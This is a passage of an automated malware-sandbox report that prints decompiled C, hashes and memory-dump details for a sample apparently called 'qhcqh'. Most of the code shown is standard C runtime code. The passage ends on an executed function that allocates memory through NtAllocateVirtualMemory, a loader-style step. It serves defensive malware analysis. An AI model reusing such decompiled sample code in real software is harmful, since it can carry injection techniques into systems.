                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: e4c90b7f637e332f78bfd8c6334bbfc7d358ee2e8be00a8280c45b35524d416b
                                                                                                                        • Instruction ID: 20e50b9627e2f7050f38fc5dab3f1f35bd662921340aee258242285e7cd46ce0
                                                                                                                        • Opcode Fuzzy Hash: e4c90b7f637e332f78bfd8c6334bbfc7d358ee2e8be00a8280c45b35524d416b
                                                                                                                        • Instruction Fuzzy Hash: BF9002686927108B4A005BB15C5DB0A75946A8865B74144A46402D4094DA9440C4A515
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F2A9B Relevance: .1, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction ID: 77291b822825c487150a3ab9e136d522e16816bae78eb085b2bb595572b3d809
                                                                                                                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction Fuzzy Hash: BF11E532604119AFD761DF79C880DA9B7E9EF146A47408015FD44CB302E334DD81C754
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F2A5E Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction ID: acd12dc5d8d68ccc9e3390bc329859eea044a0130300666ab0e2db9c7c0c16b3
                                                                                                                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction Fuzzy Hash: A4E09A35268649AFCB90CFA8CC81D25B3F8EB08320B244290FE15C73A1E634EE00DA10
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F2A29 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction ID: 6723da3204347bef8ab249c8a3128b240bdcc583c04c51530a1084fa51f9fba2
                                                                                                                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction Fuzzy Hash: ECE04F36214654DBD7B19A5AC804D97F7E9EB886B0B058465EE5997711C730FC00CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 027F297F Relevance: .0, Instructions: 7COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261999809.00000000027F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 027F2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_27f2000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C53780 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E00C53780(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xc5d4e8);
				E00C52D64(__ebx, __edi, __esi);
				_t31 = E00C54229(__ebx, _t35);
				_t15 =  *0xc5f87c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00C5226D(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xc5f780; // 0x27f1608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xc5f358;
								if(__eflags != 0) {
									_push(_t33);
									E00C5637D(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xc5f780; // 0x27f1608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xc5f780; // 0x27f1608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00C5381B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00C52FAC(_t29, 0x20);
				}
				return E00C52DA9(_t33);
			}











                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53780
                                                                                                                        0x00c53782
                                                                                                                        0x00c53787
                                                                                                                        0x00c53791
                                                                                                                        0x00c53793
                                                                                                                        0x00c5379b
                                                                                                                        0x00c537bc
                                                                                                                        0x00c537c2
                                                                                                                        0x00c537c6
                                                                                                                        0x00c537c9
                                                                                                                        0x00c537cc
                                                                                                                        0x00c537d2
                                                                                                                        0x00c537d4
                                                                                                                        0x00c537d6
                                                                                                                        0x00c537d9
                                                                                                                        0x00c537df
                                                                                                                        0x00c537e1
                                                                                                                        0x00c537e3
                                                                                                                        0x00c537e9
                                                                                                                        0x00c537eb
                                                                                                                        0x00c537ec
                                                                                                                        0x00c537f1
                                                                                                                        0x00c537e9
                                                                                                                        0x00c537e1
                                                                                                                        0x00c537f2
                                                                                                                        0x00c537f7
                                                                                                                        0x00c537fa
                                                                                                                        0x00c53800
                                                                                                                        0x00c53804
                                                                                                                        0x00c53804
                                                                                                                        0x00c5380a
                                                                                                                        0x00c53811
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a3
                                                                                                                        0x00c537a8
                                                                                                                        0x00c537ac
                                                                                                                        0x00c537b1
                                                                                                                        0x00c537b9

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00C5378C
                                                                                                                          • Part of subcall function 00C54229: __getptd_noexit.LIBCMT ref: 00C5422C
                                                                                                                          • Part of subcall function 00C54229: __amsg_exit.LIBCMT ref: 00C54239
                                                                                                                        • __amsg_exit.LIBCMT ref: 00C537AC
                                                                                                                        • __lock.LIBCMT ref: 00C537BC
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00C537D9
                                                                                                                        • InterlockedIncrement.KERNEL32(027F1608), ref: 00C53804
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        • Opcode ID: 264cc06eb06c08fd8805486faa04825a6caa79a0663df2437aaf28d39200211b
                                                                                                                        • Instruction ID: d068f196a73ff59302f00b0d9b89b3343cd1891c264d05819dbd31e1a6207c57
                                                                                                                        • Opcode Fuzzy Hash: 264cc06eb06c08fd8805486faa04825a6caa79a0663df2437aaf28d39200211b
                                                                                                                        • Instruction Fuzzy Hash: 2F01E1BDD007619BC725AB64984675D77A0FB08793F044019FC2067290CB346BC9DBDA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C5637D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 45%
                                                                                                                        			E00C5637D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xc5d660);
				_t8 = E00C52D64(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00C52DA9(_t8);
				}
				if( *0xc61c5c != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0xc60204, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00C534DA(_t32);
						 *_t10 = E00C53498(GetLastError());
					}
					goto L9;
				}
				E00C5226D(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00C522A0(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00C522D0();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00C563D3();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                        0x00c5637d
                                                                                                                        0x00c5637f
                                                                                                                        0x00c56384
                                                                                                                        0x00c56389
                                                                                                                        0x00c5638e
                                                                                                                        0x00c56405
                                                                                                                        0x00c5640a
                                                                                                                        0x00c5640a
                                                                                                                        0x00c56397
                                                                                                                        0x00c563dc
                                                                                                                        0x00c563dd
                                                                                                                        0x00c563e5
                                                                                                                        0x00c563eb
                                                                                                                        0x00c563ed
                                                                                                                        0x00c563ef
                                                                                                                        0x00c56402
                                                                                                                        0x00c56404
                                                                                                                        0x00000000
                                                                                                                        0x00c563ed
                                                                                                                        0x00c5639b
                                                                                                                        0x00c563a1
                                                                                                                        0x00c563a6
                                                                                                                        0x00c563ac
                                                                                                                        0x00c563b1
                                                                                                                        0x00c563b3
                                                                                                                        0x00c563b4
                                                                                                                        0x00c563b5
                                                                                                                        0x00c563bb
                                                                                                                        0x00c563bc
                                                                                                                        0x00c563c3
                                                                                                                        0x00c563cc
                                                                                                                        0x00000000
                                                                                                                        0x00c563ce
                                                                                                                        0x00c563ce
                                                                                                                        0x00000000
                                                                                                                        0x00c563ce

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00C5639B
                                                                                                                          • Part of subcall function 00C5226D: __mtinitlocknum.LIBCMT ref: 00C52283
                                                                                                                          • Part of subcall function 00C5226D: __amsg_exit.LIBCMT ref: 00C5228F
                                                                                                                          • Part of subcall function 00C5226D: EnterCriticalSection.KERNEL32(00C5101A,00C5101A,?,00C598E2,00000004,00C5D7C8,0000000C,00C56466,?,00C51029,00000000,00000000,00000000,?,00C541DB,00000001), ref: 00C52297
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 00C563A6
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 00C563B5
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00C5D660,0000000C,00C5224E,00000000,00C5D4A8,0000000C,00C52288,?,00C5101A,?,00C598E2,00000004,00C5D7C8,0000000C), ref: 00C563E5
                                                                                                                        • GetLastError.KERNEL32(?,00C598E2,00000004,00C5D7C8,0000000C,00C56466,?,00C51029,00000000,00000000,00000000,?,00C541DB,00000001,00000214), ref: 00C563F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: b7e96262e716981cedf7f3a66ea89a3d19c43db6f97a4f2ad4805ad8b1cae666
                                                                                                                        • Instruction ID: e947a254faa79f0cf2e30573debe2a5207878ee3fe817a9a1b74bb53fd8c0b6f
                                                                                                                        • Opcode Fuzzy Hash: b7e96262e716981cedf7f3a66ea89a3d19c43db6f97a4f2ad4805ad8b1cae666
                                                                                                                        • Instruction Fuzzy Hash: C8017C3D800355EADB256F61DC0AB5E3BA4DF01763F604018FC106B0A1DB748AC9AA5C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C5A809 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00C5A809(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00C515DE( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00C5A08C( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00C534DA(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                        0x00c5a813
                                                                                                                        0x00c5a81a
                                                                                                                        0x00c5a831
                                                                                                                        0x00000000
                                                                                                                        0x00c5a821
                                                                                                                        0x00c5a823
                                                                                                                        0x00c5a83d
                                                                                                                        0x00c5a842
                                                                                                                        0x00c5a845
                                                                                                                        0x00c5a848
                                                                                                                        0x00c5a871
                                                                                                                        0x00c5a878
                                                                                                                        0x00c5a87a
                                                                                                                        0x00c5a8fb
                                                                                                                        0x00c5a90d
                                                                                                                        0x00c5a916
                                                                                                                        0x00c5a918
                                                                                                                        0x00c5a858
                                                                                                                        0x00c5a858
                                                                                                                        0x00c5a85b
                                                                                                                        0x00c5a85d
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00c5a860
                                                                                                                        0x00000000
                                                                                                                        0x00c5a866
                                                                                                                        0x00c5a8da
                                                                                                                        0x00c5a8da
                                                                                                                        0x00c5a8df
                                                                                                                        0x00c5a8e5
                                                                                                                        0x00c5a8e8
                                                                                                                        0x00c5a8ea
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00c5a8ed
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8f1
                                                                                                                        0x00c5a87c
                                                                                                                        0x00c5a87f
                                                                                                                        0x00c5a87f
                                                                                                                        0x00c5a885
                                                                                                                        0x00c5a888
                                                                                                                        0x00c5a8af
                                                                                                                        0x00c5a8b2
                                                                                                                        0x00c5a8b2
                                                                                                                        0x00c5a8b8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8ba
                                                                                                                        0x00c5a8bd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8bf
                                                                                                                        0x00c5a8c5
                                                                                                                        0x00c5a8c8
                                                                                                                        0x00c5a836
                                                                                                                        0x00c5a836
                                                                                                                        0x00c5a8d1
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8d1
                                                                                                                        0x00c5a88a
                                                                                                                        0x00c5a88d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a891
                                                                                                                        0x00c5a89f
                                                                                                                        0x00c5a8a2
                                                                                                                        0x00c5a8a8
                                                                                                                        0x00c5a8aa
                                                                                                                        0x00c5a8ad
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00c5a8ad
                                                                                                                        0x00c5a84a
                                                                                                                        0x00c5a84d
                                                                                                                        0x00c5a84f
                                                                                                                        0x00c5a855
                                                                                                                        0x00c5a855
                                                                                                                        0x00000000
                                                                                                                        0x00c5a825
                                                                                                                        0x00c5a825
                                                                                                                        0x00c5a82a
                                                                                                                        0x00c5a82e
                                                                                                                        0x00c5a82e
                                                                                                                        0x00000000
                                                                                                                        0x00c5a82a
                                                                                                                        0x00c5a823

                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C5A83D
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00C5A871
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,00C5826E,00000109,00BFBBEF,00000003), ref: 00C5A8A2
                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00C5826E,00000109,00BFBBEF,00000003), ref: 00C5A910
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 51030d33fee9b7c2e28500455788a0c08365221be27ac57436a377d331cca205
                                                                                                                        • Instruction ID: 10ae353749c2280e1e473021c772df931332a570dcdad8c1e070b86169efcd5f
                                                                                                                        • Opcode Fuzzy Hash: 51030d33fee9b7c2e28500455788a0c08365221be27ac57436a377d331cca205
                                                                                                                        • Instruction Fuzzy Hash: 0F319335A00286EFDB10DF66C880AAD7BA5FF01312B1486A9E8619B1D1D730DEC6DB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C53EEC Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00C53EEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xc5d528);
				E00C52D64(__ebx, __edi, __esi);
				_t29 = E00C54229(__ebx, _t31);
				_t13 =  *0xc5f87c; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00C5226D(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0xc5f960; // 0xc5f888
					 *((intOrPtr*)(_t30 - 0x1c)) = E00C53EAE(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00C53F56();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00C54229(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00C52FAC(_t25, 0x20);
				}
				return E00C52DA9(_t29);
			}









                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eec
                                                                                                                        0x00c53eee
                                                                                                                        0x00c53ef3
                                                                                                                        0x00c53efd
                                                                                                                        0x00c53eff
                                                                                                                        0x00c53f07
                                                                                                                        0x00c53f2b
                                                                                                                        0x00c53f2d
                                                                                                                        0x00c53f33
                                                                                                                        0x00c53f37
                                                                                                                        0x00c53f3a
                                                                                                                        0x00c53f45
                                                                                                                        0x00c53f48
                                                                                                                        0x00c53f4f
                                                                                                                        0x00c53f09
                                                                                                                        0x00c53f09
                                                                                                                        0x00c53f0d
                                                                                                                        0x00000000
                                                                                                                        0x00c53f0f
                                                                                                                        0x00c53f14
                                                                                                                        0x00c53f14
                                                                                                                        0x00c53f0d
                                                                                                                        0x00c53f19
                                                                                                                        0x00c53f1d
                                                                                                                        0x00c53f22
                                                                                                                        0x00c53f2a

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00C53EF8
                                                                                                                          • Part of subcall function 00C54229: __getptd_noexit.LIBCMT ref: 00C5422C
                                                                                                                          • Part of subcall function 00C54229: __amsg_exit.LIBCMT ref: 00C54239
                                                                                                                        • __getptd.LIBCMT ref: 00C53F0F
                                                                                                                        • __amsg_exit.LIBCMT ref: 00C53F1D
                                                                                                                        • __lock.LIBCMT ref: 00C53F2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.261926727.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.261919693.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261949779.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261956673.0000000000C5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.261963259.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521780317-0
                                                                                                                        • Opcode ID: f41ed97df1250289f90f0bce3f6649ab0e8da3c2645e15072558884440100120
                                                                                                                        • Instruction ID: b57cda980b02130e016873974d581215e221db61ca43ee41690cb0b1653f607c
                                                                                                                        • Opcode Fuzzy Hash: f41ed97df1250289f90f0bce3f6649ab0e8da3c2645e15072558884440100120
                                                                                                                        • Instruction Fuzzy Hash: 27F0493AD04710CAD624BBE5A806B4D32F0AB01763F504259BC51A7292CB249AC9AA5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        Function 0041E7ED Relevance: 1.5, APIs: 1, Instructions: 49memorynativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 123 41e7ed-41e7ee 124 41e7f1-41e830 call 41f283 NtAllocateVirtualMemory 123->124 125 41e84f-41e86c call 12d9a00 123->125
                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0041E7ED(void* __eax, intOrPtr* __esi, void* __eflags, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24, intOrPtr _a28) {
				intOrPtr _v0;
				void* _t20;
				long _t25;
				void* _t38;

				if(__eflags >= 0) {
					_push(_a28);
					_push(_a24);
					_push(_a20);
					_push(_a16);
					_push(_a12); // executed
					_t20 =  *((intOrPtr*)( *__esi))(); // executed
					return _t20;
				} else {
					_t38 = __esi + 1;
					_t21 = _v0;
					_t3 = _t21 + 0x14; // 0x6ad05503
					_push(_t38);
					_t4 = _t21 + 0xa8c; // 0x404033
					E0041F283( *_t3, _v0, _t4,  *_t3, 0, 0x30);
					_t25 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
					return _t25;
				}
			}







                                                                                                                        0x0041e7ee
                                                                                                                        0x0041e85b
                                                                                                                        0x0041e85f
                                                                                                                        0x0041e863
                                                                                                                        0x0041e866
